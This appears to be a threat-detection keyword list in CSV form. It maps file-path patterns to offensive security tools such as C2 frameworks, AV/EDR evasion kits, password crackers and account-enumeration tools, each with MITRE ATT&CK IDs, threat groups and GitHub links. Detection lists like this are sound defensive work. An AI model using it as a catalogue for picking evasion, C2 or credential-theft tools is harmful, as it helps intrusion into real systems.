-*/Obfuscator.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
-*/Obfuscator.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
-*/obfuscator/obfuscator.*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z
-*/octopus.asm*,offensive_tool_keyword,octopus,Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z
-*/Octopus.git*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z
-*/octopusx64.asm*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z
-*/OffensiveCSharp.git*,offensive_tool_keyword,OffensiveCSharp,Collection of Offensive C# Tooling,T1059.001 - T1055.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*/OffensiveCSharp/*,offensive_tool_keyword,OffensiveCSharp,Collection of Offensive C# Tooling,T1059.001 - T1055.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*/OffensiveNotion.git,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z
-*/OffensiveNotion/agent*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - 
TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z
-*/OffensiveNotion/osxcross/target/bin*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z
-*/OffensiveNotion/utils*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,0,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z
-*/OG-Sadpanda/*,offensive_tool_keyword,cobaltstrike,.NET Assembly to Retrieve Outlook Calendar Details,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCalendar,1,1,N/A,10,10,13,1,2021-10-07T19:42:20Z,2021-10-07T17:11:46Z
-*/Oh365UserFinder*,offensive_tool_keyword,Oh365UserFinder,Oh365UserFinder is used for identifying valid o365 
accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.,T1595 - T1592 - T1589 - T1591 - T1598,TA0004 - TA0005 - TA0010,N/A,N/A,Reconnaissance,https://github.com/dievus/Oh365UserFinder,1,1,N/A,N/A,5,468,84,2023-03-21T15:59:54Z,2021-11-16T22:59:04Z
-*/OJ/gobuster*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z
-*/omg-payloads.git*,offensive_tool_keyword,omg-payloads,Official payload library for the O.MG line of products from Mischief Gadgets,T1200 - T1095 - T1059.006 - T1027,TA0010 - TA0011,N/A,N/A,Hardware,https://github.com/hak5/omg-payloads,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z
-*/omp2-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/omp2-enum-targets.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/omron-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/On_Demand_C2/*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z
-*/onedrive_user_enum*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - 
T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z
-*/oneliner.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z
-*/oneliner2.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z
-*/onesixtyone/dict.txt*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,1,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z
-*/onex.git*,offensive_tool_keyword,onex,Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/onex,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/open_vas.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/openbullet.git*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z
-*/OpenBullet2.git*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z
-*/openflow-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/openlookup-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/openvas-otp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/openwebnet-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/opt/.exegol_aliases*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*/opt/chimera*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z
-*/opt/cobaltstrike/logs*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - 
TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z
-*/opt/Covenant/Covenant/*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z
-*/opt/gocrack/files/engine*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z
-*/opt/gocrack/files/task*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z
-*/opt/icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z
-*/opt/implant/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z
-*/opt/lwp-scripts*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*/opt/lwp-wordlists*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*/opt/merlin/*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z
-*/opt/nessus/*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - 
TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A
-*/opt/Ninja/*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*/opt/Password_Cracking/*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z
-*/opt/PoshC2*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
-*/opt/rai/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z
-*/opt/seclists/Discovery/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*/optiv/Dent/*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda 
- CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,1,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z
-*/optiv/Freeze/*,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,1,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z
-*/oracle-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/oracle-brute-stealth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/oracle-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/oracle-sid-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/oracle-tns-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/orbitaldump.git*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,1,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z
-*/oscp.profile*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z
-*/osmedeus*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z
